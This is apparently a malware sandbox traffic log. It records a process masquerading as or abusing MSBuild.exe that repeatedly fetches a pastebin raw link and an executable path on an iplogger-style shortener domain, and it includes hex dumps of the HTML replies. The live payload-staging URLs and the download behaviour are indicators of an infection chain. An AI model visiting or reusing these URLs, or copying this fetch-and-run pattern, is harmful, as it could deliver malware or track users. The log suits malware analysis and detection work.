2024-09-16 19:23:18 UTC	470	IN	Data Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
2024-09-16 19:23:18 UTC	1369	IN	Data Raw: 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 Data Ascii: er" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta property
2024-09-16 19:23:18 UTC	1369	IN	Data Raw: 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 Data Ascii: olor:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:0
2024-09-16 19:23:18 UTC	1369	IN	Data Raw: 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29 3b Data Ascii: AgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name);
2024-09-16 19:23:18 UTC	1369	IN	Data Raw: 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d 72 Data Ascii: tyle>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-r
2024-09-16 19:23:18 UTC	1369	IN	Data Raw: 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 64 Data Ascii: margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="d
2024-09-16 19:23:18 UTC	155	IN	Data Raw: 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: e.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
2024-09-16 19:23:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.6	49785	104.20.4.235	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:23:23 UTC	74	OUT	GET /raw/V6VJsrV3 HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-09-16 19:23:23 UTC	222	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:23:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 8c433b0f9bc77277-EWR
2024-09-16 19:23:23 UTC	1147	IN	Data Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-16 19:23:23 UTC	1369	IN	Data Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
2024-09-16 19:23:23 UTC	1369	IN	Data Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
2024-09-16 19:23:23 UTC	529	IN	Data Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
2024-09-16 19:23:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.6	49786	188.114.97.3	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:23:24 UTC	65	OUT	GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive
2024-09-16 19:23:24 UTC	896	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:23:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close memory: 0.36197662353515625 expires: Mon, 16 Sep 2024 19:23:24 +0000 strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Last-Modified: Mon, 16 Sep 2024 19:23:24 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JAmuDJq4m0linHAzyiBxo2XLsiOj3RVGn2oRpaVASHKHbvgtXoXNzbyaImSqMy2LdfD3N8nWzs9lHhClbaJybEbUGklADAOLnNVckOJ51YWXBO2UuVBU%2BLE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c433b139c6a4352-EWR alt-svc: h3=":443"; ma=86400
2024-09-16 19:23:24 UTC	473	IN	Data Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
2024-09-16 19:23:24 UTC	1369	IN	Data Raw: 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f Data Ascii: content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta property="o
2024-09-16 19:23:24 UTC	1369	IN	Data Raw: 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 34 73 Data Ascii: r:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:0.4s
2024-09-16 19:23:24 UTC	1369	IN	Data Raw: 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29 3b 5f 79 2e Data Ascii: ntData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name);_y.
2024-09-16 19:23:24 UTC	1369	IN	Data Raw: 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d 72 61 64 69 Data Ascii: e>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-radi
2024-09-16 19:23:24 UTC	1369	IN	Data Raw: 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 64 6f 6d 61 Data Ascii: gin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="doma
2024-09-16 19:23:24 UTC	152	IN	Data Raw: 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: osition='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
2024-09-16 19:23:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.6	49787	104.20.4.235	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:23:29 UTC	74	OUT	GET /raw/V6VJsrV3 HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-09-16 19:23:29 UTC	222	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:23:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 8c433b33bda50f79-EWR
2024-09-16 19:23:29 UTC	1147	IN	Data Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 